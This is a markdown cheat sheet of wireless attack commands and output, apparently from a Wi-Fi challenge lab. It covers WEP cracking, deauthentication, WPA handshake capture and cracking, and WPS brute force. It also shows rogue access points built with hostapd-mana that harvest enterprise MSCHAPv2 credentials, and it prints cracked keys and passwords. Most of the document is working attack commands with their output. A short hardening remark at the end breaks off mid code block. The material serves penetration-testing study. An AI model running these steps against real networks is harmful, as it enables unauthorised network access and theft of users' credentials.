# Wireless Attacks

## Adapter configuration

Check that the network adapter is configured correctly.

```
iwconfig
```

Check the adapter's supported frequencies and scan for networks.

```
iwlist wlan0 frequency
iwlist wlan0 scanning
```

Network interface status.

```
iw dev wlan0mon info
airmon-ng
```

Check for conflicting processes that affect the network interface.

```
airmon-ng check
```

Kill the conflicting processes that affect the network interface.

```
airmon-ng check kill
killall dhclient wpa_supplicant
```

Bring the interface up in monitor mode.

```
airmon-ng start wlan0
```

Stop monitor mode on the interface.

```
airmon-ng stop wlan0mon
```

## MAC address modification

Change the device's MAC address. Bring the interface down first.

```
ifconfig wlan0mon down
```

List the current and changed MAC address.

```
macchanger -s wlan0mon
```

Set a random MAC address on the adapter.

```
macchanger -a wlan0mon
```

Restore the original MAC address.

```
macchanger -p wlan0mon
```

Bring the interface back up.

```
ifconfig wlan0mon up
```

## Reset network configuration

Restart the network-manager service to restore the network configuration.

```
systemctl restart NetworkManager.service
```

## Network sniffing

Sniffing with airodump-ng.

```
airodump-ng wlan0mon
```

Sniffing a specific network.

```
airodump-ng -c 6 -w capture --essid doomhack wlan0mon
```

## WEP attacks
### Fake Authentication

This attack is useful when no client is connected to the network.

```
airodump-ng -c 6 -w capture --bssid FA:6E:EE:78:B8:2D wlan0mon
```

Run the attack.

```
aireplay-ng -1 0 -e doomhack -a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE wlan0mon
```

### De-authentication

This attack is useful when clients are connected to the network.

```
airodump-ng -c 6 -w capture --bssid FA:6E:EE:78:B8:2D wlan0mon
```

Run the attack.

```
aireplay-ng -0 10 -e doomhack -c 82:D0:D3:B8:9F:FE wlan0mon
```

### ARP Request Replay
This attack requires network traffic, otherwise it will not collect enough data; at least 100k data frames are needed.

```
airodump-ng wlan0mon
```

```
CH 10 ][ Elapsed: 6 s ][ 2026-01-18 17:12

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 F0:9F:C2:71:22:11  -28       10      430    0   3   54   WEP  WEP         wifi-old
```

```
airodump-ng -c 3 -w capture --bssid F0:9F:C2:71:22:11 wlan0mon
```

```
CH  3 ][ Elapsed: 6 s ][ 2026-01-18 17:15

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 F0:9F:C2:71:22:11  -28   0       72     2896  390   3   54   WEP  WEP         wifi-old

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 F0:9F:C2:71:22:11  82:C4:D4:B6:23:BF  -29   54 -54      4      2888
```

First perform a fake authentication.

```
aireplay-ng -1 0 -e wifi-old -a F0:9F:C2:71:22:11 -h 00:C0:CA:A7:1C:BE wlan0mon
```

```
The interface MAC (02:00:00:00:00:00) doesn't match the specified MAC (-h).
	ifconfig wlan0mon hw ether 00:C0:CA:A7:1C:BE
17:06:06  Waiting for beacon frame (BSSID: F0:9F:C2:71:22:11) on channel 3

17:06:06  Sending Authentication Request (Open System)
17:06:06  Authentication successful
17:06:06  Sending Association Request
17:06:06  Association successful :-) (AID: 1)
```

Then run the ARP replay until a "got a deauth" notice appears.

```
aireplay-ng -3 -b F0:9F:C2:71:22:11 -h 00:C0:CA:A7:1C:BE wlan0mon
```

```
The interface MAC (02:00:00:00:00:00) doesn't match the specified MAC (-h).
	ifconfig wlan0mon hw ether 00:C0:CA:A7:1C:BE
17:08:33  Waiting for beacon frame (BSSID: F0:9F:C2:71:22:11) on channel 3
Saving ARP requests in replay_arp-0118-170834.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 9057 packets (got 10 ARP requests and 0 ACKs), sent 4404 packets...(499 pps)
Read 9159 packets (got 10 ARP requests and 0 ACKs), sent 4454 packets...(499 pps)
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 9263 packets (got 10 ARP requests and 0 ACKs), sent 4505 packets...(500 pps)
Read 9365 packets (got 10 ARP requests and 0 ACKs), sent 4555 packets...(500 pps)
```

If there are connected clients we can skip the fake authentication / ARP replay step and just perform a de-authentication.

```
aireplay-ng -0 10 -e wifi-old -c 82:C4:D4:B6:23:BF wlan0mon
```

```
17:16:35  Waiting for beacon frame (ESSID: wifi-old) on channel 3
Found BSSID "F0:9F:C2:71:22:11" to given ESSID "wifi-old".
17:16:35  Sending 64 directed DeAuth (code 7). STMAC: [82:C4:D4:B6:23:BF] [ 0| 0 ACKs]
17:16:35  Sending 64 directed DeAuth (code 7). STMAC: [82:C4:D4:B6:23:BF] [ 0| 0 ACKs]
```

Cracking the captured data.

```
aircrack-ng -0 capture-01.cap
```

```
Read 119245 packets.

   #  BSSID              ESSID                     Encryption

   1  F0:9F:C2:71:22:11  wifi-old                  WEP (20195 IVs)

Choosing first network as target.

Reading packets, please wait...
Opening capture-01.cap
Read 119249 packets.

1 potential targets

Attack will be restarted every 5000 captured ivs.

                               Aircrack-ng 1.7 rev f333a6a7

                 [00:00:03] Tested 88 keys (got 20655 IVs)

   KB    depth   byte(vote)
    0    0/  1   11(32000) 45(27136) E3(26624) 2C(26112) 32(26112)
    1    0/  1   BB(33280) C4(29696) 8C(28928) 5C(28672) 5E(28160)
    2    0/  2   81(29952) FF(28160) C9(27904) E4(27648) F8(27392)
    3    4/  6   CD(26368) 8A(26368) 99(26112) 9B(26112) C6(26112)
    4    6/  8   55(26624) DE(26624) B2(26368) 38(26112) D8(26112)

                         KEY FOUND! [ 11:BB:33:CD:55 ]
	Decrypted correctly: 100%
```

### Interactive Packet Replay
For this attack we need to increase network traffic by creating a fake connection.

```
airodump-ng -c 6 -w capture --bssid FA:6E:EE:78:B8:2D wlan0mon
```

Run the attack.

```
aireplay-ng -1 0 -e doomhack -a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE wlan0mon
```

Fake client connection.

```
aireplay-ng -2 -b FA:6E:EE:78:B8:2D -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 wlan0mon
```

Cracking the captured data.

```
aircrack-ng -z -0 arp01.cap
```

### Fragmentation Attack (Clientless)

This attack can be useful when no clients are connected to the network.

```
airodump-ng -c 3 -w fragcapture --bssid FA:6E:EE:78:B8:2D mon0
```

The attack can be run in different ways.

```
aireplay-ng -1 60 -e doomhack -a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE mon0
aireplay-ng -5 -b FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE mon0
packetforge-ng -0 -a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE -k 192.168.100.255 -l 192.168.100.170 -y frag.xor -w inject.cap
aireplay-ng -2 -r inject.cap mon0
```

Cracking the captured data.

```
aircrack-ng fragcapture.cap
```

### Chop Chop Attack (Clientless)

This attack can be useful when no clients are connected to the network.

```
airodump-ng -c 3 -w fragcapture --bssid FA:6E:EE:78:B8:2D mon0
```

The attack can be run in different ways.

```
aireplay-ng -1 60 -e doomhack -a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE mon0
aireplay-ng -4 -b FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE mon0
packetforge-ng -0 -a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE -k 192.168.100.255 -l 192.168.100.170 -y replay_dec_1216-123300.xor -w inject.cap
aireplay-ng -2 -r inject.cap mon0
```

Cracking the captured data.

```
aircrack-ng koreccapture-01.cap
```

## Shared-key WEP attacks

### SKA Type Cracking

This type of attack is useful when the network uses SHARED (shared key) authentication.

```
airodump-ng -c 3 -w fragcapture --bssid FA:6E:EE:78:B8:2D mon0
```

The attack can be run in different ways.

```
aireplay-ng -1 0 -e 'doomhack' -a 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0
aireplay-ng -0 10 -e doomhack -c 82:D0:D3:B8:9F:FE mon0
aireplay-ng -1 6000 -q 5 -e doomhack -y file.xor -a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE mon0
aireplay-ng -3 -b FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE mon0
aireplay-ng -0 1 -e doomhack -c 82:D0:D3:B8:9F:FE mon0
```

Cracking the captured data.

```
aircrack-ng -z -0 arp01.cap
```

## WPA / WPA2 attacks
### Deauthentication

This attack is useful when clients are connected to the network. Pick the client with the most Frames.

```
airodump-ng -c 6 -w capture.cap --bssid F0:9F:C2:71:22:12 wlan0mon
```

```
CH  6 ][ Elapsed: 2 mins ][ 2026-01-18 17:29 ][

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 F0:9F:C2:71:22:12  -28   0     1602      814    3   6   54   WPA2 CCMP   PSK  wifi-mobile

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 F0:9F:C2:71:22:12  28:6C:07:6F:F9:44  -29   54 -54      0        20
 F0:9F:C2:71:22:12  28:6C:07:6F:F9:43  -29   54 -54      0      2066
```

Run the attack.

```
aireplay-ng -0 10 -e wifi-mobile -c 28:6C:07:6F:F9:43 wlan0mon
```

```
17:28:13  Waiting for beacon frame (ESSID: wifi-mobile) on channel 6
Found BSSID "F0:9F:C2:71:22:12" to given ESSID "wifi-mobile".
17:28:13  Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:6F:F9:43] [ 0| 0 ACKs]
17:28:14  Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:6F:F9:43] [ 0| 0 ACKs]
```

This gives us the handshake.

```
CH  6 ][ Elapsed: 2 mins ][ 2026-01-18 17:29 ][ WPA handshake: F0:9F:C2:71:22:12

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 F0:9F:C2:71:22:12  -28   0     1602      814    3   6   54   WPA2 CCMP   PSK  wifi-mobile

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 F0:9F:C2:71:22:12  28:6C:07:6F:F9:44  -29   54 -54      0        20
 F0:9F:C2:71:22:12  28:6C:07:6F:F9:43  -29   54 -54      0      2066  EAPOL
```

Cracking the captured data.

```
aircrack-ng -w rockyou-top100000.txt capture.cap-01.cap
```

```
Reading packets, please wait...
Opening capture.cap-01.cap
Read 3497 packets.

   #  BSSID              ESSID                     Encryption

   1  F0:9F:C2:71:22:12  wifi-mobile               WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening capture.cap-01.cap
Read 3497 packets.

1 potential targets

                               Aircrack-ng 1.7 rev f333a6a7

      [00:00:00] 5154/1000000 keys tested (11028.80 k/s)

      Time left: 1 minute, 30 seconds                          0.52%

                           KEY FOUND! [ starwars1 ]

      Master Key     : A0 12 65 41 EA 6C E1 01 1E 1D C4 D9 E5 A3 87 7E
                       77 53 66 F8 1B F4 9B 3B DC A5 0C 01 5A 47 25 2C

      Transient Key  : D1 08 59 36 A1 39 16 5E 26 67 BB BC 3F 75 0F A4
                       6E 02 A7 18 4B C2 4E 39 3F 30 B4 BD 09 54 33 B5
                       04 4A 29 A5 A3 4D 54 30 8E 1D 8A 4F D6 CF 23 D2
                       DE 45 62 E0 44 F9 40 85 B2 8A 19 A2 BA A5 45 58

      EAPOL HMAC     : EC 10 63 3F 04 1E 82 98 03 43 28 3C 25 D1 C3 8E
```

## WPS attacks
Get information about the access point. wash scans the 2.4GHz band by default; to scan the 5GHz band we need to pass the -5 option.

```
wash -i wlan0mon
wash -5 -i wlan0mon
```

Run the attack.

```
reaver -b 34:08:04:09:3D:38 -i wlan0mon -v
```

### PixieWPS

This attack is faster than the previous one.

```
reaver -b 34:08:04:09:3D:38 -i wlan0mon -v -K
```

## Rogue Access Point
Start the network interface in monitor mode.

```
airmon-ng start wlan0
```

Capture traffic to analyze with Wireshark.

```
airodump-ng -w discovery wlan0mon
```

```
CH  3 ][ Elapsed: 30 s ][ 2026-01-18 19:08

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 F0:9F:C2:71:22:10  -28       21       36   14   6   54   OPN              wifi-guest
 32:4B:6F:A2:04:DD  -28       21        0    0   6   54   WPA2 CCMP   PSK  WIFI-JUAN
 F0:9F:C2:71:22:12  -28       21       24    9   6   54   WPA2 CCMP   PSK  wifi-mobile
 96:9A:0A:EE:7E:AE  -28       21        0    0   6   54   WPA2 CCMP   PSK  MiFibra-5-D6G3
 F0:9F:C2:1A:CA:25  -28       18       10    0  11   54e  WPA3 CCMP   SAE  wifi-IT
 F0:9F:C2:6A:88:26  -28       18        0    0  11   54   OPN              <length:  9>
 F0:9F:C2:11:0A:24  -28       18        0    0  11   54e  WPA3 CCMP   SAE  wifi-management
 72:56:98:C6:A7:B9  -28       20        0    0   9   54   WPA2 TKIP   PSK  vodafone7123
 82:C5:14:19:56:47  -28       38        0    0   3   54   WPA2 CCMP   PSK  MOVISTAR_JYG2
 F0:9F:C2:71:22:11  -28       38     1572   95   3   54   WEP  WEP         wifi-old
 F0:9F:C2:71:22:13  -28       21        0    0   8   54   WPA2 CCMP   PSK  wifi-event
```

Wireshark filter to get the information (beacon frames of the target SSID).

```
wlan.fc.type_subtype == 0x08 && wlan.ssid == "wifi-mobile"
```

Once we have the data we configure the access point.

```
apt install hostapd-mana
```

Stop monitor mode.

```
airmon-ng stop wlan0mon
```

Create the hostapd-mana configuration file (rogue.conf).

```
root@WiFiChallengeLab:~/rogue-ap# nano rogue.conf
```

```
interface=wlan0
ssid=wifi-mobile
channel=6
hw_mode=g
ieee80211n=1
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=ANYPASSWORD
wpa_pairwise=TKIP
rsn_pairwise=TKIP CCMP
mana_wpaout=/root/rogue-ap/event.hccapx
```

### Handshake capture

```
root@WiFiChallengeLab:~/rogue-ap# hostapd-mana rogue.conf
Configuration file: rogue.conf
MANA: Captured WPA/2 handshakes will be written to file '/root/rogue-ap/event.hccapx'.
Using interface wlan0 with hwaddr 4a:a9:a9:06:20:56 and ssid "wifi-event"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
```

If the handshake is not captured, a second network interface is required to de-authenticate the clients.

```
aireplay-ng -0 0 -a F0:9F:C2:71:22:12 wlan1mon
```

```
19:29:47  Waiting for beacon frame (BSSID: F0:9F:C2:71:22:12) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
19:29:47  Sending DeAuth (code 7) to broadcast -- BSSID: [F0:9F:C2:71:22:12]
19:29:47  Sending DeAuth (code 7) to broadcast -- BSSID: [F0:9F:C2:71:22:12]
19:29:48  Sending DeAuth (code 7) to broadcast -- BSSID: [F0:9F:C2:71:22:12]
19:29:48  Sending DeAuth (code 7) to broadcast -- BSSID: [F0:9F:C2:71:22:12]
```

Handshake capture.

```
root@WiFiChallengeLab:~/rogue-ap# hostapd-mana rogue.conf
Configuration file: rogue.conf
MANA: Captured WPA/2 handshakes will be written to file '/root/rogue-ap/event.hccapx'.
Using interface wlan0 with hwaddr ca:1f:0b:1c:ee:05 and ssid "wifi-mobile"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
wlan0: STA 28:6c:07:6f:f9:44 IEEE 802.11: authenticated
wlan0: STA 28:6c:07:6f:f9:44 IEEE 802.11: associated (aid 1)
wlan0: STA 28:6c:07:6f:f9:43 IEEE 802.11: authenticated
MANA: Captured a WPA/2 handshake from: 28:6c:07:6f:f9:44
MANA WPA2 HASHCAT | WPA*02*a9ef740d7234f67cedfbbf09ca5fd026*ca1f0b1cee05*286c076ff944*776966692d6d6f62696c65*39054620532c76938752c7748a5a7ebc4b2faf283ce548dba5da1bce58a76321*0103007502010a00000000000000000001665ef1ec118ffadcbfd207fb9b7506b29b74f2955a452ccfc76f42cf5c81ffe0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*00
```

Cracking the captured data.

```
aircrack-ng mostar.hccapx -e Mostar -w /usr/share/john/password.lst
```

If the hccapx file is not generated we can try to crack the hash with hashcat.

```
hashcat -m 22000 hash.txt ../rockyou-top100000.txt
```

```
Host memory required for this attack: 65 MB

Dictionary cache built:
* Filename..: ../rockyou-top100000.txt
* Passwords.: 1000000
* Bytes.....: 8583863
* Keyspace..: 1000000
* Runtime...: 0 secs

f03ee9becf9f8ecd212a7ca206f421a6:ca1f0b1cee05:286c076ff943:wifi-mobile:starwars1

Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-PBKDF2-PMKID+EAPOL
Hash.Target......: hash.txt
Time.Started.....: Sun Jan 18 19:43:45 2026 (1 sec)
Time.Estimated...: Sun Jan 18 19:43:46 2026 (0 secs)
Guess.Base.......: File (../rockyou-top100000.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     3194 H/s (9.78ms) @ Accel:96 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 5175/1000000 (0.52%)
Rejected.........: 3639/5175 (70.32%)
Restore.Point....: 4100/1000000 (0.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: dominick -> strawberries
```

## Captive Portals
Sniffing the network traffic.

```
airodump-ng -w discovery --output-format pcap wlan0mon
```

De-authenticate clients to capture the handshake.

```
aireplay-ng -0 0 -a 00:0E:08:90:3A:5F wlan0mon
```

## WPA Enterprise attacks
Identify the access points that use MGT (802.1X) authentication.

```
airodump-ng --band abg wlan0mon
```

```
CH 112 ][ Elapsed: 36 s ][ 2026-01-18 17:38

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 F0:9F:C2:7A:33:28  -25       15        4    0  44   54e  WPA2 CCMP   MGT  wifi-regional-tablets
 F0:9F:C2:71:22:17  -25       15       27    0  44   54e  WPA2 CCMP   MGT  wifi-global
 F0:9F:C2:71:22:1A  -25       15        6    0  44   54e  WPA2 CCMP   MGT  wifi-corp
 F0:9F:C2:71:22:16  -25       15        4    0  44   54e  WPA2 CCMP   MGT  wifi-regional
 F0:9F:C2:71:22:15  -25       15        6    0  44   54e  WPA2 CCMP   MGT  wifi-corp
 F0:9F:CB:3F:BC:27  -25       15        0    0  44   54   WPA2 CCMP   MGT  wifi-corp-legacy
```

Capture the handshake with a de-authentication.

```
airodump-ng -c 44 --bssid F0:9F:C2:71:22:15 -w capture wlan0mon
```

```
CH 44 ][ Elapsed: 6 s ][ 2026-01-18 17:42

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 F0:9F:C2:71:22:15  -25   0       71        7    0  44   54e  WPA2 CCMP   MGT  wifi-corp

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 F0:9F:C2:71:22:15  64:32:A8:BA:6C:41   -1   54e- 0      0         7
```

```
aireplay-ng -0 1 -a F0:9F:C2:71:22:15 -c 64:32:A8:BA:6C:41 wlan0mon
```

```
17:44:08  Waiting for beacon frame (BSSID: F0:9F:C2:71:22:15) on channel 44
17:44:08  Sending 64 directed DeAuth (code 7). STMAC: [64:32:A8:BA:6C:41] [ 0| 0 ACKs]
```

```
CH 44 ][ Elapsed: 1 min ][ 2026-01-18 17:45 ][ WPA handshake: F0:9F:C2:71:22:15

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 F0:9F:C2:71:22:15  -26   0      976       96    0  44   54e  WPA2 CCMP   MGT  wifi-corp

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 F0:9F:C2:71:22:15  64:32:A8:BA:6C:41  -26   54e-54e     0       860  PMKID
```

Stop monitor mode.

```
airmon-ng stop wlan0mon
```

Filter the capture in Wireshark to extract the certificate.

```
wlan.bssid == F0:9F:C2:71:22:15 && eap && tls.handshake.certificate
```

```
Frame 1610: 51 bytes on wire (408 bits), 51 bytes captured (408 bits)
IEEE 802.11 QoS Data, Flags: ......F.
Logical-Link Control
802.1X Authentication
Extensible Authentication Protocol
    Code: Request (1)
    Id: 49
    Length: 13
    Type: Protected EAP (EAP-PEAP) (25)
    EAP-TLS Flags: 0x01
    [3 EAP-TLS Fragments (2797 bytes): #1606(1393), #1608(1397), #1610(7)]
Transport Layer Security
    TLSv1.2 Record Layer: Handshake Protocol: Server Hello
    TLSv1.2 Record Layer: Handshake Protocol: Certificate
        Content Type: Handshake (22)
        Version: TLS 1.2 (0x0303)
        Length: 2412
        Handshake Protocol: Certificate
            Handshake Type: Certificate (11)
            Length: 2408
            Certificates Length: 2405
            Certificates (2405 bytes)
                Certificate Length: 1159
                Certificate: 308204833082036ba003020102020102300d06092a864886f70d01010b05003081a7310b… (pkcs-9-at-emailAddress=server@WiFiChallenge.com,id-at-commonName=WiFiChallenge CA,id-at-organizationalUnitName=Server,id-at-organizationName=WiFiChal
                    signedCertificate
                    algorithmIdentifier (sha256WithRSAEncryption)
                    Padding: 0
                    encrypted: 3cb58f92976b91bd002bce25a9656a411be4b44c2fc19265bdc81c6fcc1e0edf4bdb473a…
                Certificate Length: 1240
                Certificate: 308204d4308203bca00302010202143d544b5d509a595a035fe095c0886eba2c40c85130… (pkcs-9-at-emailAddress=ca@WiFiChallenge.com,id-at-commonName=WiFiChallenge CA,id-at-organizationalUnitName=Certificate Authority,id-at-organizationNa
    TLSv1.2 Record Layer: Handshake Protocol: Server Key Exchange
    TLSv1.2 Record Layer: Handshake Protocol: Server Hello Done
```

Save the certificate `Certificate: 308204833082036ba003020102020102300d06092a864886f70d01010b05003081a7310b…` as cert.der from Wireshark and analyze it with openssl.

```
openssl x509 -inform der -in cert.der -text
```

```
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 2 (0x2)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C = ES, ST = Madrid, L = Madrid, O = WiFiChallenge, OU = Certificate Authority, CN = WiFiChallenge CA, emailAddress = ca@WiFiChallenge.com
        Validity
            Not Before: Dec 20 17:05:10 2024 GMT
            Not After : Dec 18 17:05:10 2034 GMT
        Subject: C = ES, L = Madrid, O = WiFiChallenge, OU = Server, CN = WiFiChallenge CA, emailAddress = server@WiFiChallenge.com
```

Modify the following files so the generated certificates mimic those fields.

```
nano /etc/freeradius/3.0/certs/ca.cnf
```

```
[certificate_authority]
countryName = ES
stateOrProvinceName = Madrid
localityName = Madrid
organizationName = WiFiChallenge
emailAddress = ca@WiFiChallenge.com
commonName = "WiFiChallenge CA"
```

```
nano /etc/freeradius/3.0/certs/server.cnf
```

```
[server]
countryName = ES
stateOrProvinceName = Madrid
localityName = Madrid
organizationName = WiFiChallenge
emailAddress = server@WiFiChallenge.com
commonName = "WiFiChallenge CA"
```

Run the following commands.

```
root@WiFiChallengeLab:/etc/freeradius/3.0/certs# rm dh
root@WiFiChallengeLab:/etc/freeradius/3.0/certs# make
openssl dhparam -out dh -2 2048
Generating DH parameters, 2048 bit long safe prime
...
<SNIP>
...
chmod g+r client.key
openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key 'whatever' -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf
Using configuration from ./client.cnf
Check that the request matches the signature
Signature ok
The countryName field is different between
CA certificate (ES) and the request (FR)
make: *** [Makefile:120: client.crt] Error 1
```

The error only affects client.crt; ca.pem, server.pem and server.key, which the hostapd-mana configuration below references, have already been generated at that point.

Next, create two files.

```
root@WiFiChallengeLab:~/wifi-corp# cat mana.eap_user
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
```

```
root@WiFiChallengeLab:~/wifi-corp# cat network.conf
ssid=wifi-corp
interface=wlan0
driver=nl80211
channel=44
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/root/wifi-corp/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/root/wifi-corp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1
```

Start the fake access point.

```
root@WiFiChallengeLab:~/wifi-corp# hostapd-mana network.conf
Configuration file: network.conf
MANA: Captured credentials will be written to file '/root/wifi-corp/hostapd.credoutfile'.
Using interface wlan0 with hwaddr 9a:08:ec:9d:d3:a9 and ssid "wifi-corp"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
```

Now we need a second network interface in monitor mode.

```
airmon-ng start wlan1
```

We need to run the network sniffing again in order to de-authenticate the users. In this case there are two networks with the same name, so the same has to be done for both at the same time.

```
airodump-ng -c 44 --bssid F0:9F:C2:71:22:15 wlan1mon
airodump-ng -c 44 --bssid F0:9F:C2:71:22:1A wlan1mon
```

Run the de-authentication against all users of each access point.

```
root@WiFiChallengeLab:/home/user# aireplay-ng -0 1 -a F0:9F:C2:71:22:15 wlan1mon
18:35:36  Waiting for beacon frame (BSSID: F0:9F:C2:71:22:15) on channel 44
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
18:35:36  Sending DeAuth (code 7) to broadcast -- BSSID: [F0:9F:C2:71:22:15]
```

```
root@WiFiChallengeLab:/home/user# aireplay-ng -0 1 -a F0:9F:C2:71:22:1A wlan1mon
18:35:46  Waiting for beacon frame (BSSID: F0:9F:C2:71:22:1A) on channel 44
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
18:35:46  Sending DeAuth (code 7) to broadcast -- BSSID: [F0:9F:C2:71:22:1A]
```

Once de-authenticated, the clients will try to connect to our fake access point and we obtain the user's hash.

```
root@WiFiChallengeLab:~/wifi-corp# hostapd-mana network.conf
Configuration file: network.conf
MANA: Captured credentials will be written to file '/root/wifi-corp/hostapd.credoutfile'.
Using interface wlan0 with hwaddr e6:b1:c7:d5:cb:96 and ssid "wifi-corp"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
wlan0: STA 64:32:a8:07:6c:40 IEEE 802.11: authenticated
wlan0: STA 64:32:a8:07:6c:40 IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:40
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: CONTOSO\juan.tr
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: CONTOSO\juan.tr
MANA EAP EAP-MSCHAPV2 ASLEAP user=juan.tr | asleap -C c5:77:07:e2:3d:f0:c1:38 -R ec:aa:e9:c1:75:38:a4:ae:2d:e0:8e:3b:2b:6e:cc:c9:a8:cd:ca:5d:46:65:ac:5e
MANA EAP EAP-MSCHAPV2 JTR | juan.tr:$NETNTLM$c57707e23df0c138$ecaae9c17538a4ae2de08e3b2b6eccc9a8cdca5d4665ac5e:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | juan.tr::::ecaae9c17538a4ae2de08e3b2b6eccc9a8cdca5d4665ac5e:c57707e23df0c138
```

Cracking the captured data.

```
asleap -C c5:77:07:e2:3d:f0:c1:38 -R ec:aa:e9:c1:75:38:a4:ae:2d:e0:8e:3b:2b:6e:cc:c9:a8:cd:ca:5d:46:65:ac:5e -W ../rockyou-top100000.txt
```

```
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using wordlist mode with "../rockyou-top100000.txt".
	hash bytes:        343c
	NT hash:           fae3b1692331659f40239932a409343c
	password:          bulldogs1234
```

## Cracking techniques
### Airolib-ng

```
echo doomhack > essid.txt
airolib-ng doomhack --import essid essid.txt
airolib-ng doomhack --import passwd password.lst
airolib-ng doomhack --batch
airolib-ng doomhack --stats
aircrack-ng -r doomhack wpa.cap
```

### coWPAtty Dictionary Mode

```
cowpatty -r wpa-01.cap -f password.lst -2 -s doomhack
```

### coWPAtty Rainbow Table Mode

```
genpmk -f password.lst -d doomdic -s doomhack
cowpatty -r wpa-01.cap -d doomdic -2 -s doomhack
```

### Pyrit Dictionary Attack

```
pyrit -r wpa-01.cap analyze
pyrit -e doomhack -r wpa-01.cap -i password.lst attack_passthrough
```

### Pyrit Database Mode

```
pyrit eval
pyrit -i password.lst import_passwords
pyrit -e doomhack create_essid
pyrit batch
pyrit -r wpa-01.cap attack_db
```

## Decrypt network traffic

```
airdecap-ng -e doomhack -p doom1234 wpa-01.cap
```

## Connect manually to an Access Point
### Open networks

```
wpa_supplicant -i wlan0 -c wifi-client.conf
```

```
network={
    ssid="hotel_wifi"
    scan_ssid=1
}
```

### WEP networks

The key must be written in lowercase and without the ":" separators.

```
network={
    ssid="wifi-old"
    key_mgmt=NONE
    wep_key0=11bb33cd55
    wep_tx_keyidx=0
}
```

### WPA/WPA2 networks

```
wpa_supplicant -i wlan0 -c wifi-client.conf
```

```
network={
    ssid="wifi-mobile"
    scan_ssid=1
    psk="starwars1"
    key_mgmt=WPA-PSK
}
```

### WPA/WPA2 Enterprise networks

```
wpa_supplicant -i wlan0 -c wifi-client.conf
```

```
network={
    ssid="wifi-corp"
    scan_ssid=1
    key_mgmt=WPA-EAP
    identity="CONTOSO\juan.tr"
    password="bulldogs1234"
    eap=PEAP
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
```
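The enterprise block above sets no `ca_cert`, so wpa_supplicant accepts any server certificate, which is exactly what lets the hostapd-mana access point from the WPA Enterprise section harvest the MSCHAPv2 response with a cloned Issuer/Subject. As an added example (not part of the original page), the same network block hardened so the client verifies the RADIUS server; the CA file path and the host-name suffix are assumptions.

```conf
network={
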